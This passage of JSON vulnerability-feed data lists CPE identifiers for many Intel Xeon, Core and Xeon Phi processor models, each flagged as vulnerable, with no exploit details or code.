"cpe:2.3:h:intel:xeon_e5:2687w_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2650l_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w5590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5539:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5506:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5687:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5645:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e6540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e6510:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1578l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505m_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1258l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1276_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1241_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4628l_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2438l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2408l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4624l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2665:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4807:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3106:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4110:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4109t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6146:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6144:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6136:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6128:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5118:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5115:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8180:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8164:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7285:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7295:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6152:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6132:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5122:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8158:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 